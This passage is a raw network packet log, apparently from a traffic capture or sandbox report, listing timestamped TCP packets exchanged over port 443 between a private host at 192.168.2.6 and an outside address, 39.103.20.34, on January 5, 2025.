                                              Jan 5, 2025 10:11:30.372262001 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.373889923 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.373940945 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.377538919 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.377597094 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.379209042 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.379262924 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.390121937 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.390168905 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.390187025 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.390225887 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.390244007 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.390252113 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.390269995 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.390269995 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.390291929 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.390300035 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.390311956 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.390338898 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.394480944 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.394539118 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.398287058 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.398333073 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.398417950 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.398468971 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.402395964 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.402448893 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.402465105 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.402509928 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.409209013 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.409254074 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.409262896 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.409271002 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.409301996 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.409322023 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.413094997 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.413144112 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.419332027 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.419384956 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.419399977 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.419450998 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.423810959 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.423854113 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.423877001 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.423886061 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.423921108 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.423940897 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.431909084 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.431967974 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.497443914 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.497509003 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.500780106 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.500849009 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.503036022 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.503091097 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.505367041 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.505425930 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.510071039 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.510124922 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.512352943 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.512406111 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.517080069 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.517148972 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.519429922 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.519483089 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.521878004 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.521933079 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.526530027 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.526601076 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.528779984 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.528842926 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.533673048 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.533720016 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.535960913 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.536010981 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.538342953 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.538392067 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.542901993 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.542946100 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.545356989 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.545414925 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.549870014 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.549926996 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.552331924 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.552392006 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.556785107 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.556838036 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.559036970 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.559106112 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.561321974 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.561389923 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.566195011 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.566245079 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.568536997 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.568584919 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.573231936 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.573280096 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.575660944 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.575711012 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.578318119 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.578380108 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.583080053 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.583129883 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.585211992 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.585264921 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.590192080 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.590250969 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.592551947 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.592598915 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.594783068 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.594834089 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.599667072 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.599720955 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.602318048 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.602391005 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.606724977 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.606776953 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.609163046 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.609230042 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.613501072 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.613548994 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.616015911 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.616061926 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.618273020 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.618330956 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.620493889 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.620549917 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.621850967 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.621900082 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.624416113 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.624490976 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.625680923 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.625734091 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.626955032 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.627010107 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.629653931 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.629709005 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.630753040 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.630806923 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.633373976 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.633423090 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.634704113 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.634756088 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.635911942 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.635960102 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.640646935 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.640696049 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.640712976 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.640721083 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.640752077 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.640767097 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.645175934 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.645226955 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.645236015 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.645252943 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.645272970 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.645301104 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.649698019 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.649761915 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.656939030 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.656986952 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.657007933 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.657016039 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.657044888 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.657053947 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.661664009 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.661720991 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.661742926 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.661751032 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.661772966 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.661793947 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.668766022 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.668834925 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.668836117 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.668847084 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.668878078 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.668921947 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.675919056 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.675972939 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.675978899 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.675997019 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.676031113 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.676059961 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.683109999 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.683171034 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.683182001 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.683187962 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.683231115 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.690437078 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.690488100 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.690495014 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.690505028 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.690531969 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.690556049 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.694912910 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.694972992 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.694986105 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.694993019 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.695023060 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.695046902 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.702013016 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.702050924 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.702063084 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.702071905 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.702127934 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.702127934 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.708800077 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.708851099 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.708875895 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.708884001 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.708894968 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.708925009 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.712663889 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.712707043 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.712718964 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.712724924 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.712754965 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.712764978 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.716269970 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.716327906 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.716397047 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.716449022 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.718775988 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.718827009 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.718835115 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.718883038 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.722742081 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.722799063 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.722807884 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.722825050 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.722882986 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.726512909 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.726558924 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.726562977 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.726574898 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.726603031 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.726634979 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.732274055 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.732323885 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.733829021 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.733896017 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.736455917 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.736506939 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.736516953 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.736576080 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.748405933 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.748472929 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.748477936 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.748496056 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.748533964 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.752226114 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.752301931 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.752422094 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.752476931 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.759278059 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.759340048 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.759383917 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.759392977 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.759404898 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.759433985 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.766441107 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.766501904 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.766603947 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.766654015 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.773736954 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.773798943 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.773885012 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.773960114 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.781579971 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.781634092 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.781645060 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.781661034 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.781692028 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.781734943 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.785465956 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.785526037 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.785553932 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.785607100 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.792784929 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.792843103 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.792850018 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.792860985 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.792903900 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.799487114 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.799531937 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.799535036 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.799544096 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.799576044 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.799587965 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.803286076 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.803339958 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.803405046 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.803411961 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.803452015 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.806979895 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.807019949 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.807037115 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.807044983 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.807070017 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.807084084 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.809412956 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.809487104 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.809592009 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.809664011 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.813307047 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.813363075 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.813371897 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.813389063 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.813450098 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.813469887 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.817101955 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.817183971 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.817198038 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.817250967 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.821824074 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.821896076 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.822000027 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.822047949 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.826414108 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.826453924 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.826474905 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.826483965 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.826513052 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.826528072 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.838363886 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.838418007 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.838427067 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.838474989 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.842868090 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.842921972 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.842952013 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.842999935 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.849942923 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.849991083 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.849999905 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.850116014 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.857105017 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.857153893 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.857191086 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.857239008 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.864267111 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.864315033 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.864358902 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.864404917 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.871766090 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.871818066 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.871829033 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.871849060 CET4436277539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:30.871876955 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.871892929 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.873722076 CET62775443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:30.876105070 CET4436277539.103.20.34192.168.2.6
